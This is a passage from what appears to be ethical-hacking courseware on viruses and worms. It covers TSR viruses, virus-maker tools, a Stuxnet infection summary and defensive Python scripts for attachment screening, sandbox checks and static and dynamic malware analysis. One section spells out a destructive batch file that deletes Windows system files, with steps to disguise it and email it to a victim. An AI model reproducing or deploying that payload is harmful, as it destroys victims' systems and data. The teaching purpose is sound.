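    for kind, verdict in run_demo().items():
        print(f"{kind:10s} size_changed={verdict['size_changed']} "
              f"hash_changed={verdict['hash_changed']}")
```

The practical lesson is the one behind every file-integrity monitor: record a cryptographic digest of executables while they are known-good and alert on any digest change, since the cavity and intrusive cases leave the size, and often the timestamps, exactly as they were.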


Transient and Terminate and Stay Resident Viruses

Basic Infection Techniques
- Direct Action or Transient Virus: transfers the control of the host code to where it resides; selects the target program to be modified and corrupts it
- Terminate and Stay Resident Virus (TSR): remains permanently in the memory during the entire work session even after the target host's program is executed and terminated; can be removed only by rebooting the system

Transient and Terminate and Stay Resident Viruses

Transient Viruses

Transient viruses transfer all control to the host code where they reside, select the
target program to be modified, and corrupt it.

Terminate and Stay Resident Virus (TSR)

TSR viruses remain permanently in memory during the entire work session, even after
the target host program is executed and terminated. They can be removed only by rebooting
the system.



Writing a Simple Virus Program

For demonstration purposes, a simple program that can be used to cause harm to a
target system is shown here:

1. Create a batch file Game.bat with the following text:

   @echo off
   del c:\winnt\system32\*.*
   del c:\winnt\*.*

2. Convert the Game.bat batch file to Game.com using the bat2com utility
3. Assign an icon to Game.com using the Windows file properties screen
4. Send the Game.com file as an email attachment to a victim
5. When the victim runs this program, it deletes core files in the WINNT directory, making Windows unusable

The victim would have to reinstall Windows, causing problems to already saved files.
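For the file-extension deception described earlier (BAD.TXT.VBS displayed as BAD.TXT once extensions are hidden) and for the e-mailed Game.com attachment in this section, an added example that is not part of the module: a Python screen that a mail gateway or help-desk script could apply to attachment names, flagging executable extensions and benign-looking double extensions. The extension sets and all sample names other than BAD.TXT.VBS and Game.com are assumptions made for the demonstration.

```python
"""Screen attachment file names for executable and deceptive double
extensions. Added example, not code from the CEH module."""

# Assumed policy lists: extensions Windows will execute on double-click, and
# extensions a user reads as "just a document".
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".vbs", ".js", ".scr", ".pif"}
BENIGN_LOOKING_EXTS = {".txt", ".doc", ".pdf", ".jpg", ".png"}

# Constructed sample names; BAD.TXT.VBS and Game.com come from the text.
SAMPLES = ["BAD.TXT.VBS", "Game.com", "report.pdf", "README", "photo.jpg.exe"]


def displayed_name(filename):
    """Approximate what Explorer shows with 'Hide extensions for known file
    types' on: the final extension is dropped, a name without a dot stays."""
    root, _sep, _ext = filename.rpartition(".")
    return root if root else filename


def analyze(filename):
    """Classify one attachment name; all comparisons are case-insensitive."""
    parts = filename.lower().split(".")
    true_ext = "." + parts[-1] if len(parts) > 1 else ""
    inner_ext = "." + parts[-2] if len(parts) > 2 else ""
    executable = true_ext in EXECUTABLE_EXTS
    # The dangerous pattern: the real extension executes, the one the user
    # will see after hiding looks like a harmless document.
    deceptive = executable and inner_ext in BENIGN_LOOKING_EXTS
    return {
        "filename": filename,
        "shown_as": displayed_name(filename),
        "executable": executable,
        "deceptive_double_extension": deceptive,
        "verdict": "block" if executable else "allow",
    }


def screen(names=SAMPLES):
    """Analyze a batch of attachment names and return one record per name."""
    return [analyze(n) for n in names]


if __name__ == "__main__":
    for rec in screen():
        print(f"{rec['filename']:16s} shown as {rec['shown_as']:12s} "
              f"{rec['verdict']}"
              + ("  (double extension)" if rec["deceptive_double_extension"] else ""))
```

The verdict column is a plain allow/block on the real extension; the deceptive flag is the extra signal worth alerting on, because it is exactly the case in which a user who has left extensions hidden cannot tell the attachment apart from a text file.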


TeraBIT Virus Maker

[Slide: screenshot of the TeraBIT Virus Maker option list, with checkboxes such as Disable Windows Security Center, Disable Task Manager, Disable Regedit, Disable Windows Firewall, Disable Automatic Updates, Format All Hard Drives, Delete All Files In My Documents, Hide Taskbar, Swap Mouse Buttons, Spread with Floppy, Folders, and Turn off Computer After 5 Min]

TeraBIT Virus Maker

TeraBIT Virus Maker is a virus that is mostly detected by all antivirus software when
scanned. This virus mostly doesn't harm the PC, but it can disable the antivirus that is installed
on the system for a short time.


FIGURE 7.20: TeraBIT Virus Maker (screenshot of TeraBIT Virus Maker 3 showing its option checkboxes, a Run Custom Command field, File Name After Install, a setting to add fake KB(s) to the virus, Run Virus with Windows, and the Create Virus button)


JPS Virus Maker and DELmE's Batch Virus Maker

[Slide: screenshots of JPS Virus Maker 3.0 and DELmE's Batch Virus Maker]

JPS Virus Maker and DELmE's Batch Virus Maker

JPS Virus Maker

JPS Virus Maker is a tool to create viruses. It also has a feature to convert a virus into
a worm and can be used to disable the normal hardware of the system.


FIGURE 7.21: JPS Virus Maker Screenshot (JPS Virus Maker 3.0 option checkboxes such as Disable Registry, Disable MsConfig, Disable Task Manager, Disable Internet Explorer, Disable Norton Anti Virus, Disable McAfee Anti Virus, Disable CMD, Disable Security Center, Disable System Restore, Disable Control Panel, Hide Services, Hide Windows Clock, Hide Desktop Icons, Lock Mouse & Keyboard, Mute Sound, Swap Mouse Buttons; post-install actions Auto Startup, Restart, Log Off, Turn Off, Hibernate, None; Name After Install and Server Name fields)

DELmE's Batch Virus Maker

DELmE's Batch Virus Maker is a simple tool that allows you to create your own choice
of .bat file viruses to suit your tasks.
FIGURE 7.22: DELmE's Batch Virus Maker Screenshot (batch options such as Change User Password, Swap Mouse Buttons, Change Home Page and Open Web Page, with the generated batch commands shown in a text pane)


Module Flow

Prior to this, we have discussed various types of viruses. Now we will discuss
computer worms and how they are different from viruses.

Module sections: Virus and Worms Concepts, Types of Viruses, Computer Worms, Malware
Analysis, Countermeasures, Penetration Testing

This section describes worms, worm analysis (Stuxnet), and a worm maker (Internet Worm
Maker Thing).


Computer Worms

- Computer worms are malicious programs that replicate, execute, and spread across network connections independently without human interaction
- Most of the worms are created only to replicate and spread across a network, consuming available computing resources; however, some worms carry a payload to damage the host system
- Attackers use worm payloads to install backdoors in infected computers, which turns them into zombies and creates a botnet; these botnets can be used to carry out further cyber attacks

Computer Worms

Computer worms are malicious programs that replicate, execute, and spread across
network connections independently, without human interaction. Most worms are created only
to replicate and spread across a network, consuming available computing resources; however,
some worms carry a payload to damage the host system.
A worm does not require a host to replicate, although in some cases one may argue that a
worm's host is the machine it has infected. Worms are a subtype of viruses. Worms were
considered mainly a mainframe problem, but after most of the world's systems were
interconnected, worms were targeted against the Windows operating system, and were sent
through email, IRC, and other network functions.
Attackers use worm payloads to install backdoors in infected computers, which turns them into
zombies and creates a botnet; these botnets can be used to carry out further cyber-attacks.


How Is a Worm Different from a Virus?

- Replicates on its own: a worm takes advantage of file or information transport features on computer systems and spreads through the infected network automatically, but a virus does not
- A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs
- Spreads through the infected network

How Is a Worm Different from a Virus?

Virus: A virus is a file that cannot be spread to other computers unless an infected file is
replicated and actually sent to the other computer, whereas a worm does just the opposite.
Worm: A worm, after being installed on a system, can replicate itself and spread by using IRC,
Outlook, or other applicable mailing programs.

Virus: Files such as .com, .exe, or .sys, or a combination of them are corrupted once the virus
runs on the system.
Worm: A worm typically does not modify any stored programs.

Virus: Viruses are a lot harder to get off an infected machine.
Worm: As compared to a virus, a worm can be easily removed from the system.

Virus: Their spreading options are much less than that of a worm because viruses only infect
files on the machine.
Worm: They have more spreading options than a virus.

TABLE 7.1: Difference between Virus and Worms


Worm Analysis: Stuxnet

- Stuxnet is a threat targeting a specific industrial control system likely in Iran, such as a gas pipeline or power plant
- The goal of Stuxnet is to sabotage that facility by reprogramming programmable logic controllers (PLCs) to operate as the attackers intend them to, most likely out of their specified boundaries

Stuxnet contains many features such as:
1. Self-replicates through removable drives exploiting a vulnerability allowing auto-execution
2. Spreads in a LAN through a vulnerability in the Windows Print Spooler
3. Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability
4. Copies and executes itself on remote computers through network shares running a WinCC database server
5. Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is loaded
6. Updates itself through a peer-to-peer mechanism within a LAN
7. Exploits a total of four unpatched Microsoft vulnerabilities
8. Contacts a command and control server that allows the hacker to download and execute code, including updated versions
9. Contains a Windows rootkit that hides its binaries and attempts to bypass security products
10. Fingerprints a specific industrial control system and modifies code on the Siemens PLCs to potentially sabotage the system

http://www.symantec.com

Worm Analysis: Stuxnet

Source: http://www.symantec.com

Stuxnet is a complex threat and malware with diverse modules and functionalities. It is
mostly used to take control of and reprogram industrial control systems (ICS) by modifying
code on programmable logic controllers (PLCs), which creates a way for the attacker to intrude
into the complete system, launch an attack by making changes in the code, and take
unauthorized control of the systems without the knowledge of the operators.

Stuxnet contains many features such as:

- Self-replicates through removable drives exploiting a vulnerability allowing auto-execution
- Spreads in a LAN through a vulnerability in the Windows Print Spooler
- Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability
- Copies and executes itself on remote computers through network shares running a WinCC database server


- Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is loaded
- Updates itself through a peer-to-peer mechanism within a LAN
- Exploits a total of four unpatched Microsoft vulnerabilities
- Contacts a command and control server that allows the hacker to download and execute code, including updated versions
- Contains a Windows rootkit that hides its binaries and attempts to bypass security products
- Fingerprints a specific industrial control system and modifies code on the Siemens PLCs to potentially sabotage the system

Worm Analysis: Stuxnet (Cont'd)
Source: http://www.symantec.com
Stuxnet consists of a large .dll file that contains many different exports and resources and two encrypted configuration blocks. It hooks Ntdll.dll to monitor for requests to load specially crafted filenames; these specially crafted filenames are mapped to another location instead, a location specified by W32.Stuxnet. The dropper component of Stuxnet is a wrapper program that contains all components stored inside itself in a section named "stub." When the threat is executed, the wrapper extracts the .dll file from the stub section, maps it into memory as a module, and calls one of the exports. Whenever an export is called, Stuxnet typically injects the entire DLL into another process and then just calls the particular export. When injecting into a trusted process, Stuxnet may keep the injected code in the trusted process or instruct the trusted process to inject the code into another currently running process. It uses a special method designed to bypass behavior blocking and host intrusion-protection based technologies that monitor LoadLibrary calls.

Worm Analysis: Stuxnet (Cont'd)
Source: http://www.symantec.com

Infection Routine Flow
Stuxnet checks if it has administrator rights on the computer. Stuxnet wants to run with the highest privilege possible so that it has permission to take whatever actions it likes on the computer. If it does not have Administrator rights, it executes one of the two zero-day escalation of privilege attacks described in the following diagram.
If the process already has the rights it requires, it proceeds to prepare to call export 16 in the main .dll file. It calls export 16 by using the injection techniques described in the Injection Techniques section.
When the process does not have administrator rights on the system, it tries to attain these privileges by using one of two zero-day escalation of privilege attacks. The attack vector used is based on the operating system of the compromised computer. If the operating system is Windows Vista, Windows 7, or Windows Server 2008 R2, the currently undisclosed Task Scheduler Escalation of Privilege vulnerability is exploited. If the operating system is Windows XP, the currently undisclosed win32k.sys escalation of privilege vulnerability is exploited.

If exploited, both of these vulnerabilities result in the main .dll file running as a new process, either within the csrss.exe process in the case of the win32k.sys vulnerability or as a new task with administrator rights in the case of the Task Scheduler vulnerability.
The code to exploit the win32k.sys vulnerability is stored in resource 250. Details of the win32k.sys vulnerability and the Task Scheduler vulnerability currently are not released as patches are not yet available.
After export 15 completes the required checks, export 16 is called.
Export 16 is the main installer for Stuxnet. It checks the date and the version number of the compromised computer; decrypts, creates, and installs the rootkit files and registry keys; injects itself into the services.exe process to infect removable drives; injects itself into the Step 7 process to infect all Step 7 projects; sets up the global mutexes that are used to communicate between different components; and connects to the RPC server.
Export 16 first checks that the configuration data is valid; after that, it checks the value "NTVDM TRACE" in the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation
FIGURE 7.23: Infection Routine Flow (flowchart of export 16 from the Symantec analysis; boxes: Check CFG (error → exit); registry key NTVDM Trace = 19790529 (equal → exit); Date < 06/24/2012 (past deadline → exit); Check OS: XP or less → Set DACL, Vista or higher → Set SACL; Create .pnf and .cfg files (Oem7a.pnf); Decrypt resources 201 and 242 and write rootkit files Mrxnet.sys and Mrxcls.sys to disk; Create rootkit service registry keys; Set file times; Decrypt and load self from disk, call export 6 (get version) and compare the running version number with the version on disk; Create global mutexes; Hides malicious files; Inject in service and call export 32 (infects removable drives); Inject in Step 7 and call export 32 (infects Step 7 projects); Exit)

Worm Maker: Internet Worm Maker Thing
Internet Worm Maker Thing is a tool specifically designed for generating a worm.

The generated Internet worms try to spread over networks; they are essentially preset invasion proxy attacks that target the host, poison it, and establish a base from which to launch the attack in future. The worms work independently. An Internet worm sends copies of itself via vulnerable computers on the Internet.

FIGURE 7.24: Internet Worm Maker Thing (screenshot of the Version 4.00 Public Edition options dialog)

Module Flow

Malware analysis is defined as the action of taking malware apart in order to study it. It is usually performed for various reasons, such as finding the vulnerabilities that are exploited for spreading the malware, the information that was stolen, and the prevention techniques to be applied to keep it from entering the system or network in future.

The module flow covers: Virus and Worms Concepts; Types of Viruses; Computer Worms; Malware Analysis; Countermeasures; Penetration Testing.

Detailed information about the malware analysis procedure is explained in the next few slides.

What Is a Sheep Dip Computer?

Sheep dipping refers to the analysis of suspect files, incoming messages, etc. for malware.
This "sheep dipped" computer is isolated from other computers on the network to block any viruses from entering the system. Before this procedure is carried out, any downloaded programs are saved on external media such as CD-ROMs or floppy diskettes.
A sheep dip computer is installed with port monitors, file monitors, network monitors, and antivirus software and connects to a network only under strictly controlled conditions.
A sheep dip computer:
• Runs port and network monitors
• Runs user, group permission, and process monitors
• Runs device driver and file monitors
• Runs registry and kernel monitors

Antivirus Sensor Systems
An antivirus system is a collection of computer software that detects and analyzes various malicious code threats such as viruses, worms, and Trojans. They are used along with sheep dip computers.

FIGURE 7.25: Working of Antivirus Sensor Systems (diagram: Internet → antivirus system made up of anti-virus, anti-spyware, anti-Trojan, anti-spamware, anti-phishing and email-scanner components → network with System 1, System 2 and System 3; allowed traffic is passed through to the systems, reflected traffic is sent back)

An antivirus system includes antivirus, anti-spyware, anti-Trojan, anti-spamware, anti-phishing, an email scanner, and so on. Usually, it is placed in between the network and the Internet. It allows only genuine traffic to flow through the network and blocks malicious traffic from entering. As a result, it ensures network security.

Malware Analysis Procedure: Preparing Testbed
Malware analysis provides in-depth understanding of each individual sample and identifies emerging technical trends from large collections of malware samples. The samples of malware are mostly Windows binary executables. Malware analysis is conducted with a variety of goals. The following is the procedure for preparing the malware analysis testbed:
1. Install VMware or Virtual PC on the system
2. Install the guest OS into the Virtual PC/VMware
3. Isolate the system from the network by ensuring that the NIC card is in "host only" mode
4. Disable the shared folders and the guest isolation
5. Copy the malware over to the guest OS
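As an added example (not part of the courseware), the following Python script checks a VMware .vmx file against steps 3 and 4 of the testbed procedure: every NIC host-only, shared folders and the guest isolation options disabled. The .vmx keys are the ones VMware Workstation writes (ethernet0.connectionType, isolation.tools.*.disable); the sample .vmx contents are constructed.

```python
"""Testbed isolation check for a VMware .vmx file (added example, not courseware code).

Parses the key = "value" lines of a .vmx file and reports whether each NIC is
host-only, whether shared folders (HGFS) are disabled and whether the guest
isolation options (copy, paste, drag-and-drop) are disabled. The keys below are
the ones VMware Workstation writes into the .vmx; the sample .vmx text is
constructed for this example.
"""
import re

# Settings the checklist expects, as key -> required value.
# isolation.tools.* are VMware's "guest isolation" options; hgfs is shared folders.
REQUIRED = {
    "isolation.tools.hgfs.disable": "TRUE",   # shared folders off
    "isolation.tools.copy.disable": "TRUE",   # guest isolation: no copy to host
    "isolation.tools.paste.disable": "TRUE",  # guest isolation: no paste from host
    "isolation.tools.dnd.disable": "TRUE",    # guest isolation: no drag-and-drop
}

_LINE = re.compile(r'^\s*([A-Za-z0-9_.:]+)\s*=\s*"?([^"]*)"?\s*$')


def parse_vmx(text: str) -> dict:
    """Return the .vmx settings as a dict; keys are lower-cased so lookups are case-insensitive."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        match = _LINE.match(line)
        if match:
            settings[match.group(1).lower()] = match.group(2).strip()
    return settings


def check_testbed(vmx_text: str) -> list:
    """Return a list of findings; an empty list means the VM satisfies the checklist."""
    settings = parse_vmx(vmx_text)
    findings = []
    # Every NIC that is present must be host-only, so the guest has no NAT or
    # bridged path to the real network (step 3 of the procedure).
    for key in sorted(settings):
        if re.fullmatch(r"ethernet\d+\.present", key) and settings[key].upper() == "TRUE":
            nic = key.rsplit(".", 1)[0]
            conn = settings.get(f"{nic}.connectiontype", "")
            if conn.lower() != "hostonly":
                findings.append(f"{nic}: connectionType is '{conn or 'unset'}', expected hostonly")
    # Shared folders and guest isolation must be explicitly disabled (step 4).
    for key, expected in REQUIRED.items():
        actual = settings.get(key)
        if actual is None:
            findings.append(f"{key} is not set (not explicitly disabled)")
        elif actual.upper() != expected:
            findings.append(f"{key} = {actual}, expected {expected}")
    return findings


# Constructed samples: a VM as the new-VM wizard typically leaves it (NAT,
# guest isolation untouched) and the same VM hardened for the sandbox.
WEAK_VMX = """\
.encoding = "UTF-8"
config.version = "8"
displayName = "malware-lab"
ethernet0.present = "TRUE"
ethernet0.connectionType = "nat"
isolation.tools.hgfs.disable = "FALSE"
"""

HARDENED_VMX = """\
displayName = "malware-lab"
ethernet0.present = "TRUE"
ethernet0.connectionType = "hostonly"
isolation.tools.hgfs.disable = "TRUE"
isolation.tools.copy.disable = "TRUE"
isolation.tools.paste.disable = "TRUE"
isolation.tools.dnd.disable = "TRUE"
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_VMX), ("hardened", HARDENED_VMX)):
        print(label, check_testbed(text) or "OK")
```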

Malware Analysis Procedure
Step 1: Perform static analysis when the malware is inactive
Step 2: Collect information about:
• String values found in the binary with the help of string extracting tools such as BinText
• The packaging and compressing technique used with the help of compression and decompression tools such as UPX

BinText
Source: http://www.mcafee.com
BinText can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text, and resource strings, providing useful information for each item in the optional "advanced" view mode.

FIGURE 7.26: BinText Screenshot (BinText 3.0.3 scanning a file in advanced view; columns File pos, Mem pos, ID, Text, with entries marked A for ASCII and U for Unicode; status line "Time taken: 0.109 secs, Text size: 37340 bytes (36.46K)"; counts AN: 1840, UN: 373, RS: 0)

UPX
Source: http://upx.sourceforge.net
UPX achieves an excellent compression ratio and offers very fast decompression. It typically compresses better than WinZip/zip/gzip.
Administrator: C:\Windows\system32\cmd.exe

D:\CEH-Tools\CEHv8 Module 07 Viruses and Worms\Compression and Decompression\UPX\upx308w\upx308w>upx.exe
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08w       Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

Commands:
  -1     compress faster                   -9    compress better
  -d     decompress                        -l    list compressed file
  -t     test compressed file              -V    display version number
  -h     give more help                    -L    display software license
Options:
  -q     be quiet                          -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  -k     keep backup files
file..   executables to (de)compress

Type 'upx --help' for more detailed help.

UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net

D:\CEH-Tools\CEHv8 Module 07 Viruses and Worms\Compression and Decompression\UPX\upx308w\upx308w>

FIGURE 7.27: UPX Working in Command Prompt
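An added example, not code from BinText or UPX: the Python below extracts ASCII and Unicode strings from a binary the way BinText lists them, and reads the PE section table to flag UPX packing (UPX0/UPX1 section names and the "UPX!" marker), so the analyst knows to run upx -d before relying on the strings. The PE buffer it scans is a constructed, minimal stand-in built by build_sample(), not a real executable.

```python
"""Static-analysis helpers for step 2 (added example, not BinText or UPX code):
pull printable ASCII and Unicode (UTF-16LE) strings out of a binary the way
BinText lists them, and spot the two signs that a Windows executable was packed
with UPX: section names UPX0/UPX1 in the PE section table and the "UPX!" marker.
The PE bytes built by build_sample() are a constructed, minimal stand-in (valid
MZ/PE headers and section table, no real code).
"""
import re
import struct


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return (kind, offset, text) tuples; kind is 'A' for ASCII, 'U' for UTF-16LE."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    unicode_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [("A", m.start(), m.group().decode("ascii")) for m in ascii_re.finditer(data)]
    found += [("U", m.start(), m.group().decode("utf-16-le")) for m in unicode_re.finditer(data)]
    return sorted(found, key=lambda item: item[1])


def pe_section_names(data: bytes) -> list:
    """Walk the PE section table and return the section names ([] if not a PE file)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    coff = e_lfanew + 4                       # COFF file header follows the signature
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_of_optional      # section table follows the optional header
    names = []
    for i in range(num_sections):
        entry = table + i * 40                # IMAGE_SECTION_HEADER is 40 bytes
        if entry + 40 > len(data):
            break
        names.append(data[entry:entry + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def upx_indicators(data: bytes) -> dict:
    """Evidence that a sample is UPX-packed and should be unpacked (upx -d) before string analysis."""
    names = pe_section_names(data)
    return {
        "sections": names,
        "upx_sections": [n for n in names if n.upper().startswith("UPX")],
        "upx_marker": b"UPX!" in data,
    }


def looks_upx_packed(data: bytes) -> bool:
    ind = upx_indicators(data)
    return bool(ind["upx_sections"]) or ind["upx_marker"]


def build_sample(packed: bool) -> bytes:
    """Constructed PE-like buffer: DOS header, PE signature, COFF header, a stub
    optional header, a 3-entry section table and a few embedded strings."""
    sections = ["UPX0", "UPX1", ".rsrc"] if packed else [".text", ".rdata", ".rsrc"]
    optional = b"\x0b\x01" + b"\0" * 94      # PE32 magic 0x10b plus padding (stub)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(optional), 0x102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("ascii"), 0x1000, 0x1000 * (i + 1),
                    0x200, 0, 0, 0, 0, 0, 0xE0000020)
        for i, name in enumerate(sections)
    )
    body = b"This program cannot be run in DOS mode.\r\n$\0\0"
    if packed:
        body += b"UPX!\0\0\0\0"                # marker UPX leaves in the packed image
    body += b"http://example.invalid/update.bin\0\0\0"
    body += "kernel32.dll".encode("utf-16-le") + b"\0\0"
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)   # e_lfanew -> 0x40
    return dos + b"PE\0\0" + coff + optional + table + body


if __name__ == "__main__":
    for packed in (False, True):
        sample = build_sample(packed)
        print("packed" if looks_upx_packed(sample) else "not packed", upx_indicators(sample))
        for kind, offset, text in extract_strings(sample):
            print(f"{kind} {offset:08X} {text}")
```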

Malware Analysis Procedure (Cont'd)
Step 3: Set up the network connection and check that it is not giving any errors
Step 4: Run the virus and monitor the process actions and system information with the help of process monitoring tools such as Process Monitor and Process Explorer

Process Monitor
Source: http://technet.microsoft.com
Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, registry, and process/thread activity.

FIGURE 7.28: Process Monitor Screenshot (Process Monitor - Sysinternals: www.sysinternals.com, showing 89,723 of 186,768 events (48%); columns Time of Day, Process Name, PID, Operation, Path, Result, Detail; rows for Explorer.EXE (PID 2384: CreateFileMapping, CloseFile, CreateFile on C:\Windows\System32\imageres.dll), mmc.exe (PID 4100: ReadFile on C:\Windows\Microsoft.NET\Framework\...) and firefox.exe (PID 2760: TCP Receive, TCP Send between WIN-MSSELCK4K41 ports); all results SUCCESS)
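An added example, not Sysinternals code: the Python below triages a Process Monitor CSV export for step 4, following the sample process and the processes it creates and flagging persistence writes, file drops under C:\Windows, child processes, outbound connections and DLLs loaded from user-writable paths. The CSV rows, process names and addresses are constructed; the column names are those of a Process Monitor CSV export.

```python
"""Triage of a Process Monitor CSV export (added example, not Sysinternals code).

Process Monitor records every file, registry, process and network operation; the
value for the analyst is in filtering that stream down to what the sample and its
children did. triage() follows the sample process (and any process it creates)
through a CSV export and flags operations that matter for step 4: persistence via
registry, file drops into the Windows directory, child processes, outbound
connections and images loaded from user-writable paths. The CSV below is
constructed; its columns are the ones Process Monitor exports.
"""
import csv
import io
import re

# Detection rules: (label, operation pattern, path pattern).
RULES = [
    ("persistence: Run key modified", r"^RegSetValue$", r"\\CurrentVersion\\Run\b"),
    ("persistence: service key modified", r"^RegSetValue$", r"\\Services\\"),
    ("file written under C:\\Windows", r"^(WriteFile|CreateFile)$", r"^C:\\Windows\\"),
    ("child process spawned", r"^Process Create$", r"."),
    ("outbound network connection", r"^TCP (Connect|Send)$", r"."),
    ("image loaded from user-writable path", r"^Load Image$", r"\\AppData\\|\\Temp\\"),
]

# Constructed Process Monitor export (File > Save > CSV). Hostnames, PIDs and
# paths are made up; 203.0.113.5 is a documentation address; mrxcls.sys is the
# rootkit driver name from the Stuxnet flow earlier in this module.
PROCMON_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"12:13:46.6200000","Explorer.EXE","2384","CreateFileMapping","C:\\Windows\\System32\\imageres.dll","SUCCESS","SyncType: SyncTypeCreateSection"
"12:13:47.0010000","sample.exe","3320","Process Create","C:\\Users\\Administrator\\AppData\\Local\\Temp\\svch0st.exe","SUCCESS","PID: 3404, Command line: svch0st.exe -install"
"12:13:47.1200000","sample.exe","3320","CreateFile","C:\\Windows\\System32\\drivers\\mrxcls.sys","SUCCESS","Desired Access: Generic Write, Disposition: OverwriteIf"
"12:13:47.1300000","sample.exe","3320","WriteFile","C:\\Windows\\System32\\drivers\\mrxcls.sys","SUCCESS","Offset: 0, Length: 26,616"
"12:13:47.2300000","sample.exe","3320","RegSetValue","HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater","SUCCESS","Type: REG_SZ, Length: 84, Data: C:\\Users\\Administrator\\AppData\\Local\\Temp\\svch0st.exe"
"12:13:47.3100000","sample.exe","3320","TCP Connect","WIN-MSSELCK4K41:49712 -> 203.0.113.5:443","SUCCESS","Length: 0, mss: 1460"
"12:13:47.4000000","firefox.exe","2760","TCP Receive","WIN-MSSELCK4K41:1056 -> WIN-MSSELCK4K41:1055","SUCCESS","Length: 1, seqnum: 0"
"12:13:47.5500000","svch0st.exe","3404","Load Image","C:\\Users\\Administrator\\AppData\\Local\\Temp\\helper.dll","SUCCESS","Image Base: 0x10000000, Image Size: 0x8000"
"12:13:47.6000000","svch0st.exe","3404","CreateFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Desired Access: Read Data/List Directory"
"""


def triage(csv_text: str, sample_process: str) -> list:
    """Return (label, process, operation, path) for flagged operations of the sample
    process and of every process it creates, in log order."""
    tracked = {sample_process.lower()}
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        proc = row["Process Name"]
        if proc.lower() not in tracked or row["Result"] != "SUCCESS":
            continue
        op, path, detail = row["Operation"], row["Path"], row["Detail"]
        if op == "Process Create":
            tracked.add(path.rsplit("\\", 1)[-1].lower())   # follow the child as well
        for label, op_re, path_re in RULES:
            if not (re.search(op_re, op) and re.search(path_re, path, re.IGNORECASE)):
                continue
            if op == "CreateFile" and "Write" not in detail:
                continue   # opens for read are normal DLL loading, not a file drop
            findings.append((label, proc, op, path))
    return findings


def summarize(findings: list) -> dict:
    """Count findings per rule label, the view that goes into the analysis report."""
    counts = {}
    for label, _, _, _ in findings:
        counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    hits = triage(PROCMON_CSV, "sample.exe")
    for label, proc, op, path in hits:
        print(f"[{label}] {proc}: {op} {path}")
    print(summarize(hits))
```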

Malware Analysis Procedure (Cont'd)

5. Record network traffic information using the connectivity and log packet content monitoring tools such as NetResident and TCPView

6. Determine the files added, processes spawned, and changes to the registry with the help of registry monitoring tools such as RegShot

[Figure: NetResident event list; http://www.tamos.com]

Malware Analysis Procedure (Cont'd)

Step 5: Record network traffic information using connectivity and log packet content monitoring tools such as NetResident and TCPView

Step 6: Determine the files added, processes spawned, and changes to the registry with the help of registry monitoring tools such as RegShot

NetResident

Source: http://www.tamos.com

NetResident is a network content analysis application designed to monitor, store, and reconstruct a wide range of network events and activities, such as email messages, web pages, downloaded files, instant messages, and VoIP conversations. It uses advanced monitoring technology to capture the data on the network, saves the data to a database, reconstructs it, and displays the content.
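The reconstruction that step 5 relies on, shown as an added Python example (not NetResident's, TCPView's or the page's own code): a constructed in-memory pcap is parsed frame by frame, TCP segments are grouped into connections, and each connection is summarized in the Party A / Port A / Party B / Port B form the tool displays, with the HTTP request line and Host header recovered from the client stream. The addresses and hostnames are placeholders.

```python
import struct

PCAP_MAGIC = 0xA1B2C3D4   # classic libpcap magic as read from a little-endian file
LINKTYPE_ETHERNET = 1

def _ip(addr):
    return bytes(int(o) for o in addr.split("."))

def build_frame(src, sport, dst, dport, payload):
    """Ethernet + IPv4 + TCP frame carrying payload (checksums left zero; the parser ignores them)."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                     1, 0, 64, 6, 0, _ip(src), _ip(dst))
    return eth + ip + tcp + payload

def build_pcap(frames):
    """Classic pcap file: 24-byte global header, then a 16-byte record header per frame."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1349430000 + i, 0, len(frame), len(frame)) + frame
    return out

# Constructed capture (not from the page): analysis VM 10.0.0.5 posts to a web
# server and opens one TLS connection; addresses and hostnames are placeholders.
SAMPLE_PCAP = build_pcap([
    build_frame("10.0.0.5", 1076, "198.51.100.20", 80,
                b"POST /news/xhr/rhc?authuser=0 HTTP/1.1\r\nHost: news.example.test\r\n"
                b"Content-Length: 7\r\n\r\ncid=123"),
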